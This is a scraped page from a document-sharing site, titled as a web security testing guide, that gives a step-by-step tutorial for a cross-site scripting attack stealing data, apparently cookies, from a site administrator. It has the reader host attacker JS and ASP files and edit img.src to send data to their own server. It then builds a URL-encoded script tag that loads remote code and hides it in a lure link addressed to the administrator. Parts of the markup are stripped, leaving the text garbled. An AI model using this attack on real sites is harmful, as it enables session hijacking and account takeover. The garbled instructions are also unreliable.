Web安全测试技术与实践指南.pdfVIP

  • 2
  • 0
  • 约小于1千字
  • 约 2页
  • 2026-06-28 发布于北京
  • 举报

在工具中,最让人头疼的就是盗取这个版面.绝对有许多人不知道怎么

用.

现在就说一程吧.

把生成出来的JS和ASP文件放入空间的根目录中,如果你放的不是根目录,那么

就需要修改JS文件.把

img.src=+str;(把红色部分修改掉,在

后面添加上自己的路径.)

然后找到JS的地址,如[]

ahref=跨站地址scriptsrc=管理员您好,您

的有/a

在此是我们就把scriptsrc=进行URL加密.

ahref=跨站地

址%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%31%32%37%

2E%30%2E%30%2E%31%2F%67%2E%6A%73%3E管理员您好,您的有/a

最后把这个盗取连接发送给管理员,只要他点击.

您可能关注的文档

文档评论(0)

1亿VIP精品文档

相关文档